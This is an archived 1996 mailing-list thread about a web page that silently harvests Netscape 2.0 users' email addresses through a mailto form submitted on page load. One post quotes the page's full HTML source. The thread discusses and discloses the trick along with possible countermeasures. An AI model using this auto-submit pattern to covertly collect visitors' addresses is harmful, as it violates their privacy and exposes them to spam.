JavaScript to grab email
Another annoying feature in JavaScript and Netscape. Have a look at <http://www.popco.com/grabtest.html> The page uses JavaScript to steal your e-mail address and sends a test e-mail message to the address it grabbed. It works with Netscape, which is probably only browser supporting JavaScript. Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature. The script was developed and announced by Glenn Fleishman, moderator of the Internet Marketing mailing list. Thanks for letting people know. Jüri Kaljundi jk@digit.ee Digiturg http://www.digit.ee/
On Tue, 20 Feb 1996 16:33:21 +0200 (EET), Jyri Kaljundi <jk@digit.ee> said:
Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature.
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is. Mike
Mike Rose wrote:
On Tue, 20 Feb 1996 14:21:31 -0500 (EST), "Mark M." <markm@voicenet.com> said:
On Tue, 20 Feb 1996, Mike Rose wrote:
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is.
Netscape doesn't need to know your email address. Your email address is put into the headers by sendmail. Netscape will make a "from" header of what you claim in the "indentity" field, but your real address is also in the headers - "sender:" in mine.
I was under the impression that netscape doesn't run sendmail at all; it speaks SMTP directly. In that case, changing your email adress in the options should suffice. However, if you do this, actually sending mail and news from netscape will get messed up, won't it? - Ian
-----BEGIN PGP SIGNED MESSAGE----- On Tue, 20 Feb 1996, Mike Rose wrote:
Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature.
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is. The comments on the page tell you that deleting your e-mail address from Netscape's config, or supplying it with a false one, prevents the script from working. I visited the page using a fake e-mail address, and have yet to be sent a confirmation e-mail. BTW, here's the source for the page: <HTML> <HEAD> </HEAD> <BODY onLoad="document.mailme.submit()"> <!-- Howdy! yeah, the code is pretty darn simple, eh? Soon 1,000s of people will be scamming email addresses in this manner. At least we discovered it first. The real trick to make it stop? Put a bogus email address in your browser's "email reply" ent. Or leave it blank--> <form method=post name="mailme" action="mailto:reply@simenon.popco.com?subject=scammed address"> <h3>Viewing this page automatically submits email to an address which then sends you back email to prove it grabbed the message.</h3> <input type=hidden name="scammed.the.address" value="did it"> </form> </BODY></HTML> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= markm@voicenet.com | finger -l for PGP key 0xf9b22ba5 http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5 -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQCVAwUBMSofNbZc+sv5siulAQGV6QP/feZ59C51ZAjKkrvBUCdNOvhtJqQJsR2I uigA5owTzecDXfnwCC3XB4w08ym0lgA1pwKcAEWl4hhOPyBmnerKbT2Q96Z5JMFe LwQnbP78fDB/Sx101X5uYHh47tGGkfzGbMhjLcrVpTrpgIDMYBEKLtfyZknwI4xQ Do9CPVr9lwM= =XMTH -----END PGP SIGNATURE-----
Mark M. writes:
On Tue, 20 Feb 1996, Mike Rose wrote:
Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature.
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is. The comments on the page tell you that deleting your e-mail address from Netscape's config, or supplying it with a false one, prevents the script from working. I visited the page using a fake e-mail address, and have yet to be sent a confirmation e-mail.
On my system (Linux), the "Sender: " header contains my address no matter what I set my address too. -- Jeff
On Tue, 20 Feb 1996 14:21:31 -0500 (EST), "Mark M." <markm@voicenet.com> said:
On Tue, 20 Feb 1996, Mike Rose wrote:
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is.
Netscape doesn't need to know your email address. Your email address is put into the headers by sendmail. Netscape will make a "from" header of what you claim in the "indentity" field, but your real address is also in the headers - "sender:" in mine. Mike
participants (5)
-
Ian Goldberg -
Jeff Barber -
Jyri Kaljundi -
Mark M. -
Mike Rose